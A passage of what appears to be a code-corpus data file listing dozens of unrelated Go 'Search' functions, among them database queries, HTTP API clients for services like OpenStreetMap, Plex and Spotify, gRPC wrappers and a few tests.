(\n\t\tcps []Codepoint\n\t\tq = `\n\t\t\tSELECT\n\t\t\t\tc.hex, c.dec, c.category, c.name, c.aliases, c.entity,\n\t\t\t\ts.rank\n\t\t\tFROM codepoints AS c\n\t\t\tINNER JOIN (\n\t\t\t\tSELECT\n\t\t\t\t\trowid,\n\t\t\t\t\tbm25(search) AS rank\n\t\t\t\tFROM search\n\t\t\t\tWHERE search MATCH ?\n\t\t\t) AS s\n\t\t\tON c.rowid = s.rowid\n\t\t\tORDER BY s.rank\n\t\t\tLIMIT 200`\n\t\t// search for a single character\n\t\tq2 = `\n\t\t\tSELECT\n\t\t\t\tc.hex, c.dec, c.category, c.name, c.aliases, c.entity\n\t\t\tFROM codepoints AS c\n\t\t\tWHERE c.dec = ?\n\t\t`\n\t\terr error\n\t)\n\tif runes := []rune(query); len(runes) == 1 {\n\t\terr = repo.db.Select(&cps, q2, runes[0])\n\t} else {\n\t\terr = repo.db.Select(&cps, q, query)\n\t}\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"SQL query failed: %w\", err)\n\t}\n\n\tlog.Printf(\"[repo] %d result(s) for %q\", len(cps), query)\n\treturn cps, nil\n}", "func (c *Client) Search(ctx context.Context, req *querypb.SearchRequest) (*internalpb.SearchResults, error) {\n\treturn wrapGrpcCall(ctx, c, func(client querypb.QueryNodeClient) (*internalpb.SearchResults, error) {\n\t\treturn client.Search(ctx, req)\n\t})\n}", "func (c *Client) Search(keyword string) ([]Movie, error) {\n\treturn []Movie{}, fmt.Errorf(\"not implemented\")\n}", "func (s *Server) Search(ctx context.Context, req *querypb.SearchRequest) (*internalpb.SearchResults, error) {\n\treturn s.querynode.Search(ctx, req)\n}", "func search(query string, ch chan<-string){\n\tgo duckDuckGoSearch(query, ch)\n\tgo googleSearch(query, ch)\n\tgo bingSearch(query, ch)\n}", "func Search(w http.ResponseWriter, r *http.Request) {\n\tq := r.URL.Query()\n\n\tif keywords, ok := q[\"keyword\"]; ok {\n\t\tsearch := keywords[0]\n\n\t\tproducts, err := lib.Search(search)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tbytes, err := helpers.JSONMarshal(products, true)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tfmt.Fprintf(w, \"%s\", bytes)\n\t}\n}", "func (c *Client) Search(query string) ([]Place, error) {\n\tvar cli http.Client\n\n\treq, err := http.NewRequest(http.MethodGet, apiSearch, nil)\n\tif err != nil {\n\t\treturn nil, xerrors.Errorf(\"could not create HTTP request: %w\", err)\n\t}\n\n\treq.Header.Set(\"User-Agent\", c.UserAgent)\n\n\tform := make(url.Values)\n\tform.Add(\"q\", query)\n\tform.Add(\"format\", \"jsonv2\")\n\tswitch c.AddressDetails {\n\tcase true:\n\t\tform.Add(\"addressdetails\", \"1\")\n\tdefault:\n\t\tform.Add(\"addressdetails\", \"0\")\n\t}\n\tif c.AcceptLanguages != nil {\n\t\tform.Add(\"accept-language\", strings.Join(c.AcceptLanguages, \",\"))\n\t}\n\treq.URL.RawQuery = form.Encode()\n\n\tresp, err := cli.Do(req)\n\tif err != nil {\n\t\treturn nil, xerrors.Errorf(\"could not send request to OpenStreetMap: %w\", err)\n\t}\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != http.StatusOK {\n\t\tout := new(bytes.Buffer)\n\t\tio.Copy(out, resp.Body)\n\t\treturn nil, xerrors.Errorf(\n\t\t\t\"invalid status code %s (%d):\\n%s\",\n\t\t\tresp.Status, resp.StatusCode, out.String(),\n\t\t)\n\t}\n\n\tvar places []Place\n\terr = json.NewDecoder(resp.Body).Decode(&places)\n\tif err != nil {\n\t\treturn nil, xerrors.Errorf(\"could not decode JSON reply from %q: %w\", req, err)\n\t}\n\n\treturn places, nil\n}", "func (p *Plex) Search(title string) (SearchResults, error) {\n\tif title == \"\" {\n\t\treturn SearchResults{}, errors.New(\"ERROR: A title is required\")\n\t}\n\n\trequestInfo.headers.Token = p.token\n\n\ttitle = url.QueryEscape(title)\n\tquery := p.URL + \"/search?query=\" + title\n\n\tvar results SearchResults\n\n\tresp, respErr := requestInfo.get(query)\n\n\tif respErr != nil {\n\t\treturn SearchResults{}, respErr\n\t}\n\n\t// Unauthorized\n\tif resp.StatusCode == 401 {\n\t\treturn SearchResults{}, errors.New(\"You are not authorized to access that server\")\n\t}\n\n\tdefer resp.Body.Close()\n\n\terr := json.NewDecoder(resp.Body).Decode(&results)\n\n\tif err != nil {\n\t\treturn SearchResults{}, err\n\t}\n\n\treturn results, nil\n}", "func (zypper *zypper) Search(pack string) (bool, error) {\n\t_, code, err := RunCommandWithRetry(zypper.cmder.SearchCmd(pack), nil)\n\n\t// zypper search returns 104 when it cannot find the package.\n\tif code == 104 {\n\t\treturn false, nil\n\t}\n\n\treturn true, err\n}", "func (b *BreweryService) Search(query string) ([]*Brewery, *http.Response, error) {\n\t// Use default parameters as specified by API\n\treturn b.SearchOffsetLimit(query, 0, 25)\n}", "func (s *SearchService) Search(options *SearchOptions) (searchResult *SearchResult, err error) {\n\turl := fmt.Sprintf(\"%s/search\", baseURL)\n\turl, err = constructURL(url, options)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbody, err := sendGET(s.httpClient, url)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = json.Unmarshal(body, &searchResult)\n\treturn searchResult, err\n}", "func Search(name string) {\n\t/*\n\t\t\tif v, exist := cmdMap[name]; exist {\n\t\t\t\treturn v\n\t\t\t}\n\t\treturn nil\n\t*/\n}", "func (s *SearchService) Search(ctx context.Context, filters ...searchDomain.Filter) (*domain.SearchResult, error) {\n\thits := s.findProducts(ctx, filters, s.productService.GetMarketPlaceCodes())\n\tcurrentPage := s.findCurrentPage(filters)\n\tfacets, selectedFacets := s.createFacets(filters)\n\n\tdocuments := make([]searchDomain.Document, len(hits))\n\tfor i, hit := range hits {\n\t\tdocuments[i] = hit\n\t}\n\n\treturn &domain.SearchResult{\n\t\tResult: searchDomain.Result{\n\t\t\tSearchMeta: searchDomain.SearchMeta{\n\t\t\t\tQuery: \"\",\n\t\t\t\tOriginalQuery: \"\",\n\t\t\t\tPage: currentPage,\n\t\t\t\tNumPages: 10,\n\t\t\t\tNumResults: len(hits),\n\t\t\t\tSelectedFacets: selectedFacets,\n\t\t\t\tSortOptions: nil,\n\t\t\t},\n\t\t\tHits: documents,\n\t\t\tSuggestion: []searchDomain.Suggestion{},\n\t\t\tFacets: facets,\n\t\t},\n\t\tHits: hits,\n\t}, nil\n}", "func (m *remote) Search(ctx context.Context, query *search.Query, handler Handler) error {\n\tstream, err := m.client.Search(ctx, query)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn event.Feed(ctx, event.AsHandler(ctx, handler), grpcutil.ToProducer(stream))\n}", "func search() {\n\tr := *repo\n\ti := *issue\n\trepos := setRepositories()\n\n\tfor key, value := range repos {\n\t\tif repos[key].name == r {\n\t\t\tclient := &http.Client{}\n\t\t\trepoName := value\n\t\t\treq, err := http.NewRequest(\"GET\", \"https://api.github.com/search/issues\", nil)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"[ERROR] Some issue with request.\")\n\t\t\t}\n\t\t\tq := req.URL.Query()\n\t\t\tq.Add(\"q\", fmt.Sprintf(\"%s+repo:%s\", i, repoName.repo))\n\t\t\treq.URL.RawQuery = q.Encode()\n\t\t\tresp, _ := client.Do(req)\n\t\t\tbody, err := ioutil.ReadAll(resp.Body)\n\t\t\tdefer resp.Body.Close()\n\t\t\tprintResults(body)\n\t\t}\n\t}\n}", "func (c Client) Search(repo, q, filter, dist string, perPage int) ([]Package, error) {\n\tendpoint := fmt.Sprintf(\"%s/repos/%s/search.json?q=%s&filter=%s&dist=%s&per_page=%d\", ServiceURL, repo, q, filter, dist, perPage)\n\n\treq, err := http.NewRequest(\"GET\", endpoint, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.SetBasicAuth(c.token, \"\")\n\treq.Header.Add(\"User-Agent\", UserAgent)\n\n\tclient := &http.Client{}\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tvar packages []Package\n\terr = decodeResponse(resp, &packages)\n\treturn packages, err\n}", "func Search(query string) ([]Result, error) {\n\tlog.Println(\"serial search\")\n\tresults := []Result{\n\t\tWeb(query),\n\t\tImage(query),\n\t\tVideo(query),\n\t}\n\treturn results, nil\n}", "func (s *Service) Search(ctx context.Context, params *light.SearchParams) (*empty.Empty, error) {\n\t_, span := trace.StartSpan(ctx, \"hue.lights.search\")\n\tdefer span.End()\n\n\tctx = context.WithValue(ctx, hue.UserKey{}, params.GetUser())\n\tctx = context.WithValue(ctx, hue.HostKey{}, params.GetHost())\n\n\treturn nil, s.hue.SearchLights(ctx, params.GetDevices())\n}", "func semanticSearch(ctx *context.Context, query, repo string) {\n\turl := \"https://sourcegraph.com/.api/global-search?Query=golang+\" + url.QueryEscape(query) + \"&Limit=30&Fast=1&Repos=\" + url.QueryEscape(repo)\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tlog.Error(\"semanticSearch.http.Get (%s): %v\", url, err)\n\t\treturn\n\t}\n\n\tdata, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tlog.Error(\"semanticSearch.ioutil.ReadAll (%s): %v\", url, err)\n\t\treturn\n\t}\n\tdata = bytes.TrimSpace(data)\n\n\tif len(data) == 0 {\n\t\tif len(repo) == 0 {\n\t\t\tsemanticSearch(ctx, query, \"github.com/golang/go\")\n\t\t} else {\n\t\t\tctx.JSON(200, map[string]interface{}{\n\t\t\t\t\"results\": nil,\n\t\t\t})\n\t\t}\n\t\treturn\n\t}\n\n\tvar sgResults semanticSearchResult\n\tif err = json.Unmarshal(data, &sgResults); err != nil {\n\t\tlog.Error(\"semanticSearch.json.Unmarshal (%s): %v\", url, err)\n\t\tlog.Error(\"JSON: %s\", string(data))\n\t\treturn\n\t}\n\n\tmaxResults := 7\n\tresults := make([]*searchResult, 0, maxResults)\n\tfor _, def := range sgResults.Defs {\n\t\tif !def.Exported {\n\t\t\tcontinue\n\t\t}\n\n\t\tvar title, desc, url string\n\t\tswitch def.Kind {\n\t\tcase \"package\":\n\t\t\ttitle = def.Unit\n\t\tcase \"func\":\n\t\t\t// recevier/method -> recevier_method\n\t\t\tanchor := strings.Replace(def.Path, \"/\", \"_\", 1)\n\t\t\ttitle = def.Unit + \"#\" + anchor\n\t\tdefault:\n\t\t\tcontinue\n\t\t}\n\n\t\t// Limit length of description to 100.\n\t\tif len(def.Docs) > 0 {\n\t\t\tif len(def.Docs[0].Data) > 100 {\n\t\t\t\tdesc = def.Docs[0].Data[:100] + \"...\"\n\t\t\t} else {\n\t\t\t\tdesc = def.Docs[0].Data\n\t\t\t}\n\t\t}\n\t\turl = \"/\" + title\n\n\t\tresults = append(results, &searchResult{\n\t\t\tTitle: title,\n\t\t\tDescription: desc,\n\t\t\tURL: url,\n\t\t})\n\n\t\tif len(results) >= maxResults {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tctx.JSON(200, map[string]interface{}{\n\t\t\"results\": results,\n\t})\n}", "func Search(matcher Matcher, searchTerm string, results chan<- Result) {\n\t// Search the data for the search term.\n\tsearchResults, err := matcher.Match(searchTerm)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn\n\t}\n\n\t// Write the results to the channel.\n\tfor _, searchResult := range searchResults {\n\t\tresults <- searchResult\n\t}\n}", "func (c *Client) Search(term string) (*Response, error) {\n\thttpResp, err := c.sendRequest(\"GET\", term, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tresult := &Response{}\n\n\tif httpResp.StatusCode == http.StatusOK {\n\t\tdefer httpResp.Body.Close()\n\t\tbody, err := ioutil.ReadAll(httpResp.Body)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\terr = json.Unmarshal(body, &result)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\t}\n\tvar ErrNotFound = errors.New(\"Error with status code \" + strconv.Itoa(httpResp.StatusCode))\n\treturn nil, ErrNotFound\n}", "func Search(expression string, data interface{}) (interface{}, error) {\n\tintr := newInterpreter()\n\tparser := NewParser()\n\tast, err := parser.Parse(expression)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn intr.Execute(ast, data)\n}", "func (vm *FstVM) Search(input string) []string {\n\ttape, snap, acc := vm.run(input)\n\tif !acc || len(snap) == 0 {\n\t\treturn nil\n\t}\n\tc := snap[len(snap)-1]\n\tpc := c.pc\n\tsz := int(vm.prog[pc] & valMask)\n\tpc++\n\tif sz == 0 {\n\t\treturn []string{string(tape[0:c.tape])}\n\t}\n\ts := toInt(vm.prog[pc : pc+sz])\n\tpc += sz\n\tsz = int(vm.prog[pc])\n\tpc++\n\te := toInt(vm.prog[pc : pc+sz])\n\tvar outs []string\n\tfor i := s; i < e; i++ {\n\t\th := i\n\t\tfor vm.data[i] != 0 {\n\t\t\ti++\n\t\t}\n\t\tt := append(tape[0:c.tape], vm.data[h:i]...)\n\t\touts = append(outs, string(t))\n\t}\n\tpc += sz\n\treturn outs\n}", "func (w *Workspace) Search(walkFunc source.WalkFunc) {\n\tif w == nil {\n\t\treturn\n\t}\n\tw.cache.Walk(walkFunc)\n}", "func (sq *SQ3Driver) Search(pattern string, ignoreCase, searchContent bool) (SearchFeed, error) {\n\t// Make our channel\n\tch := make(SearchFeed, 1000) // Buffered channel with 1000 slots, so we can burst\n\n\t// Kick off our scanner\n\tgo sq.realSearch(pattern, ignoreCase, searchContent, ch)\n\n\t// And, return our chan\n\treturn ch, nil\n}", "func Search(w http.ResponseWriter, r *http.Request) {\r\n\tsearch := r.FormValue(\"search\")\r\n\tvar data = make(map[string]interface{})\r\n\r\n\t//search function with name\r\n\tf := map[string]string{\"name\": search}\r\n\tfs, err := models.GetFunc(&f)\r\n\ttrace(\"home.Search->\", err)\r\n\tif len(fs) != 0 {\r\n\t\tdata[\"func\"] = fs\r\n\t}\r\n\r\n}", "func (s *BridgechainsService) Search(ctx context.Context, query *Pagination, body *BridgechainsSearchRequest) (*Bridgechains, *http.Response, error) {\n\tvar responseStruct *Bridgechains\n\tresp, err := s.client.SendRequest(ctx, \"POST\", \"bridgechains/search\", query, body, &responseStruct)\n\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn responseStruct, resp, err\n}", "func (d *DirectAddress) Search(key int) (interface{}, error) {\n\tif err := d.validateKey(key); err != nil {\n\t\treturn nil, err\n\t}\n\treturn d.array[key-d.uMin], nil\n}", "func (s *Service) Search(ctx context.Context, searchFilters filters.Args, term string, limit int, authConfig *registry.AuthConfig, headers map[string][]string) ([]registry.SearchResult, error) {\n\tif err := searchFilters.Validate(acceptedSearchFilterTags); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// TODO(thaJeztah): the \"is-automated\" field is deprecated; reset the field for the next release (v26.0.0). Return early when using \"is-automated=true\", and ignore \"is-automated=false\".\n\tisAutomated, err := searchFilters.GetBoolOrDefault(\"is-automated\", false)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tisOfficial, err := searchFilters.GetBoolOrDefault(\"is-official\", false)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\thasStarFilter := 0\n\tif searchFilters.Contains(\"stars\") {\n\t\thasStars := searchFilters.Get(\"stars\")\n\t\tfor _, hasStar := range hasStars {\n\t\t\tiHasStar, err := strconv.Atoi(hasStar)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errdefs.InvalidParameter(errors.Wrapf(err, \"invalid filter 'stars=%s'\", hasStar))\n\t\t\t}\n\t\t\tif iHasStar > hasStarFilter {\n\t\t\t\thasStarFilter = iHasStar\n\t\t\t}\n\t\t}\n\t}\n\n\t// TODO(thaJeztah): the \"is-automated\" field is deprecated. Reset the field for the next release (v26.0.0) if any \"true\" values are present.\n\tunfilteredResult, err := s.searchUnfiltered(ctx, term, limit, authConfig, headers)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfilteredResults := []registry.SearchResult{}\n\tfor _, result := range unfilteredResult.Results {\n\t\tif searchFilters.Contains(\"is-automated\") {\n\t\t\tif isAutomated != result.IsAutomated { //nolint:staticcheck // ignore SA1019 for old API versions.\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tif searchFilters.Contains(\"is-official\") {\n\t\t\tif isOfficial != result.IsOfficial {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tif searchFilters.Contains(\"stars\") {\n\t\t\tif result.StarCount < hasStarFilter {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tfilteredResults = append(filteredResults, result)\n\t}\n\n\treturn filteredResults, nil\n}", "func TestSearch(t *testing.T) {\n\tp := playback{\n\t\tDevices: []Address{\n\t\t\t0x0000000000000000,\n\t\t\t0x0000000000000001,\n\t\t\t0x0010000000000000,\n\t\t\t0x0000100000000000,\n\t\t\t0xffffffffffffffff,\n\t\t\t0xfc0000013199a928,\n\t\t\t0xf100000131856328,\n\t\t},\n\t}\n\t// Fix-up the CRC byte for each device.\n\tvar buf [8]byte\n\tfor i := range p.Devices {\n\t\tbinary.LittleEndian.PutUint64(buf[:], uint64(p.Devices[i]))\n\t\tcrc := CalcCRC(buf[:7])\n\t\tp.Devices[i] = (Address(crc) << 56) | (p.Devices[i] & 0x00ffffffffffffff)\n\t}\n\n\t// We're doing one search operation per device, plus a last one.\n\tp.Ops = make([]IO, len(p.Devices)+1)\n\tfor i := 0; i < len(p.Ops); i++ {\n\t\tp.Ops[i] = IO{Write: []byte{0xf0}, Pull: WeakPullup}\n\t}\n\n\t// Start search.\n\tif err := p.Tx([]byte{0xf0}, nil, WeakPullup); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Perform search.\n\taddrs, err := p.Search(false)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Verify we got all devices.\n\tif len(addrs) != len(p.Devices) {\n\t\tt.Fatalf(\"expected %d devices, got %d\", len(p.Devices), len(addrs))\n\t}\nmatch:\n\tfor _, ai := range p.Devices {\n\t\tfor _, aj := range addrs {\n\t\t\tif ai == aj {\n\t\t\t\tcontinue match\n\t\t\t}\n\t\t}\n\t\tt.Errorf(\"expected to find %#x but didn't\", ai)\n\t}\n\tif err := p.Close(); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func (s *NodeService) Search(ctx context.Context, request *diztl.SearchRequest) (*diztl.SearchResponse, error) {\n\tlog.Printf(\"Received search request: %v\\n\", request.GetSource())\n\tfiles := s.Indexer.Search(request.GetFilename())\n\tresponse := diztl.SearchResponse{Files: files, Node: s.node}\n\treturn &response, nil\n}", "func (s Service) SearchSong(w http.ResponseWriter, r *http.Request) {\n\tquery := r.URL.Query().Get(\"query\")\n\tres := s.getIDs(query)\n\tenableCors(&w)\n\tjson.NewEncoder(w).Encode(res)\n}", "func (m Model) Search(query string) []Result {\n\tvar results []Result\n\n\twords := Tokenize(query)\n\tif len(words) == 0 {\n\t\treturn results\n\t}\n\n\t// main search query\n\tif err := m.PG.Model(&Occurence{}).\n\t\tColumnExpr(\"(SELECT name FROM files WHERE id = occurence.file_id) as file_name\").\n\t\tColumnExpr(\"SUM(occurence.count) as sum\").\n\t\tColumnExpr(\"array_agg(occurence.word_id) as words\").\n\t\tJoin(\"JOIN words on occurence.word_id = words.id\").\n\t\tWhere(\"words.word in (?)\", pg.In(words)).\n\t\tGroup(\"occurence.file_id\").\n\t\tOrder(\"sum DESC\").\n\t\tSelect(&results); err != nil {\n\t\tlog.Println(err.Error())\n\t}\n\n\treturn results\n}", "func (store *InMemoryLaptopStore) Search(ctx context.Context, filter *pb.Filter, found func(laptop *pb.Laptop) error) error {\n\tstore.mutex.RLock()\n\tdefer store.mutex.RUnlock()\n\n\tfor _, laptop := range store.data {\n\t\t// time.Sleep(1 * time.Second)\n\t\tlog.Print(\"checking laptop id: \", laptop.GetId())\n\n\t\t//check the context\n\t\tif ctx.Err() == context.DeadlineExceeded || ctx.Err() == context.Canceled {\n\t\t\tlog.Print(\"Context is cancelled\")\n\t\t\treturn errors.New(\"context is cancelled\")\n\t\t}\n\n\t\tif isQualified(filter, laptop) {\n\t\t\t// deep copy\n\t\t\tother, err := deepCopy(laptop)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\terr = found(other)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func Search() *cobra.Command {\n\tsearchCmd := &cobra.Command{\n\t\tUse: \"search\",\n\t\tShort: \"Search for food in USDA database\",\n\t\tPersistentPreRun: func(cmd *cobra.Command, args []string) {\n\t\t\tlog.SetLevel(log.DebugLevel)\n\t\t\tlog.SetFormatter(&log.JSONFormatter{\n\t\t\t\tFieldMap: log.FieldMap{\n\t\t\t\t\tlog.FieldKeyTime: \"timestamp\",\n\t\t\t\t\tlog.FieldKeyLevel: \"loglevel\",\n\t\t\t\t\tlog.FieldKeyMsg: \"message\",\n\t\t\t\t},\n\t\t\t\tTimestampFormat: time.RFC3339,\n\t\t\t})\n\t\t},\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tingredientSearch()\n\t\t},\n\t}\n\tsearchCmd.PersistentFlags().StringVarP(&food, \"food\", \"f\", \"\", \"Food to search for\")\n\treturn searchCmd\n}", "func (c *Client) Search(term string) ([]RantModel, error) {\n\turl := fmt.Sprintf(SEARCH_PATH, API, term, APP_VERSION)\n\tres, err := http.Get(url)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar data SearchResponse\n\tjson.NewDecoder(res.Body).Decode(&data)\n\tif !data.Success && data.Error != \"\" {\n\t\treturn nil, errors.New(data.Error)\n\t}\n\treturn data.Rants, nil\n}", "func Search(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\tl := logger.New(\"default\")\n\n\tquery := r.URL.Query().Get(\"q\")\n\tresults, err := catalog.SearchMulti(url.QueryEscape(query))\n\tif err != nil {\n\t\tl.Errorf(err.Error())\n\t\thttp.Error(w, \"HTTP 500 : Internal Server Error\", 500)\n\t\treturn\n\t}\n\tcontext := struct {\n\t\tTitle string\n\t\tQuery string\n\t\tResults tmdb.SearchMultiResult\n\t}{\n\t\t\"tvt.io\",\n\t\tquery,\n\t\tresults,\n\t}\n\tt := template.Must(template.ParseFiles(\n\t\t\"templates/search.html\",\n\t\t\"templates/partials/facebook.html\",\n\t\t\"templates/partials/footer.html\",\n\t\t\"templates/partials/javascript.html\",\n\t\t\"templates/partials/css.html\",\n\t))\n\tt.Execute(w, context)\n}", "func (this *WordDictionary) Search(word string) bool {\n \n}", "func (c *Client) Search(ctx context.Context, search string, opts *SearchOptions) ([]*Torrent, error) {\n\tif opts == nil {\n\t\topts = &SearchOptions{\n\t\t\tCategory: All,\n\t\t}\n\t}\n\tv := opts.Category.URLValue()\n\tv.Add(\"q\", search)\n\tpath := \"/q.php?\" + v.Encode()\n\treturn c.fetchTorrents(ctx, path)\n}", "func execSearch(_ int, p *gop.Context) {\n\targs := p.GetArgs(2)\n\tret := sort.Search(args[0].(int), args[1].(func(int) bool))\n\tp.Ret(2, ret)\n}", "func (d *GormRecipesStore) Search(query string, offset, limit uint64) ([]*Recipe, error) {\n\tvar recipes []*Recipe\n\terr := d.db.\n\t\tOffset(offset).\n\t\tLimit(limit).\n\t\tWhere(\"name LIKE ?\", fmt.Sprintf(\"%%%s%%\", query)).\n\t\tFind(&recipes).Error\n\treturn recipes, errors.WithStack(err)\n}", "func (r *QueryService) Search(searchrequest *SearchRequest) *QuerySearchCall {\n\tc := &QuerySearchCall{s: r.s, urlParams_: make(gensupport.URLParams)}\n\tc.searchrequest = searchrequest\n\treturn c\n}", "func (r *QueryService) Search(searchrequest *SearchRequest) *QuerySearchCall {\n\tc := &QuerySearchCall{s: r.s, urlParams_: make(gensupport.URLParams)}\n\tc.searchrequest = searchrequest\n\treturn c\n}", "func (c *Client) Search(ctx context.Context, password string, opts ...grpc.CallOption) (count int, err error) {\n\tdigest := sha1.Sum([]byte(password))\n\tprefix, suffix := pwned.SplitDigest(digest)\n\n\tresp, err := c.pc.Range(ctx, &pb.RangeRequest{\n\t\tPrefix: prefix,\n\t}, opts...)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\tif len(resp.Results)%(pwned.SuffixSize+1) != 0 {\n\t\treturn 0, errors.New(\"pwned: invalid result set returned\")\n\t}\n\n\treturn pwned.SearchSet(resp.Results, suffix), nil\n}", "func (m defaultMatcher) Search(feed *Feed, searchTerm string) ([]*Result, error) {\n\treturn nil, nil\n}", "func Search(ctx context.Context, term string, options *SearchOptions) ([]entities.ImageSearchReport, error) {\n\tif options == nil {\n\t\toptions = new(SearchOptions)\n\t}\n\tconn, err := bindings.GetClient(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tparams, err := options.ToParams()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tparams.Set(\"term\", term)\n\n\t// SkipTLSVerify is special. It's not being serialized by ToParams()\n\t// because we need to flip the boolean.\n\tif options.SkipTLSVerify != nil {\n\t\tparams.Set(\"tlsVerify\", strconv.FormatBool(!options.GetSkipTLSVerify()))\n\t}\n\n\theader, err := auth.MakeXRegistryAuthHeader(&imageTypes.SystemContext{AuthFilePath: options.GetAuthfile()}, options.GetUsername(), options.GetPassword())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse, err := conn.DoRequest(ctx, nil, http.MethodGet, \"/images/search\", params, header)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer response.Body.Close()\n\n\tresults := []entities.ImageSearchReport{}\n\tif err := response.Process(&results); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn results, nil\n}", "func Search(binary string, p string, t string, q string, userProvider bool, outputOnly bool, verbose bool) error {\n\tprov, err := ExpandProvider(p)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbuilders := []Provider{}\n\n\tif t == \"\" || userProvider {\n\t\tbuilders = append(builders, Providers[prov])\n\t}\n\n\tif t != \"\" {\n\t\ttag, err := ExpandTag(t)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tbuilders = append(builders, GetProvidersByTag(tag)...)\n\t}\n\n\tvar success bool\n\n\tfor _, builder := range builders {\n\t\tif builder != nil {\n\t\t\turl := builder.BuildURI(q)\n\n\t\t\tif verbose || outputOnly {\n\t\t\t\tfmt.Printf(\"%s\\n\", url)\n\t\t\t}\n\n\t\t\tif !outputOnly {\n\t\t\t\terr = launcher.OpenURI(binary, url)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tsuccess = true\n\t\t}\n\t}\n\n\tif !success {\n\t\treturn fmt.Errorf(\"No providers found for tag %q.\", t)\n\t}\n\n\treturn nil\n}", "func (w *Watch) search() (*ldap.SearchResult, error) {\n\treturn w.watcher.conn.Search(w.searchRequest)\n}", "func (business *Business) Search(ctx context.Context, req *bs.BusinessRequest, rsp *bs.BusinessResponse) error {\n\tlog.Print(\"Received Business.Search request\")\n\tif len(req.Req.Q) == 0 {\n\t\treturn errors.BadRequest(\"business\", \"please enter mandatory fields\")\n\t}\n\n\td := &ds.DatastoreRequest{}\n\td.Req = req.Req\n\tres, err := dsClient.Search(context.TODO(), d)\n\tif nil != err {\n\t\tcommon.PrintError(err)\n\t}\n\n\tqRsp := &query.Response{}\n\n\tif res.Rsp == \"\" {\n\t\t//\t\tpost message to trigger external API request\n\t\treqBytes, err := common.EncByteArray(req.Req)\n\t\tif err != nil {\n\t\t\tcommon.PrintError(err)\n\t\t}\n\t\tcommon.Publish(\"sendExternalApiReq\", reqBytes)\n\t\t//\t\twait for response from external api\n\t\tqRsp.Response = <-msg\n\t\t//\t\tsame response in DB\n\t\tsaveReq := &ds.SaveRequest{}\n\t\tsaveReq.Req = req.Req\n\t\tsaveReq.Recipe = qRsp.Response\n\t\tdsClient.Save(context.TODO(), saveReq)\n\t} else {\n\t\tfmt.Println(\"got ds.search reply \", res)\n\t\tqRsp.Response = res.Rsp\n\t}\n\trsp.Rsp = qRsp\n\treturn nil\n}", "func SearchSpotify(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(\"Received Request: /SearchSpotify\")\n\tparams := mux.Vars(r)\n\tquery := params[\"query\"]\n\tfmt.Println(\"Query: \" + query)\n\n\tvar URL *url.URL\n\tURL, err := url.Parse(\"https://api.spotify.com\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tURL.Path += \"/v1/search\"\n\tparameters := url.Values{}\n\tparameters.Add(\"q\", query)\n\tparameters.Add(\"type\", \"track\")\n\t// limit the number of results. Default: 20\n\tparameters.Add(\"limit\", \"20\")\n\tURL.RawQuery = parameters.Encode()\n\n\t// get html for user to sign in to\n\tclient := &http.Client{}\n\treq, err := http.NewRequest(\"GET\", URL.String(), nil)\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"Authorization\", \"Bearer \"+sAcsTok.AccessToken)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\terr = json.Unmarshal(body, &sTracks)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Search results for first track in list and first artist linked to that track\n\tfmt.Println()\n\tfmt.Println(\"Search 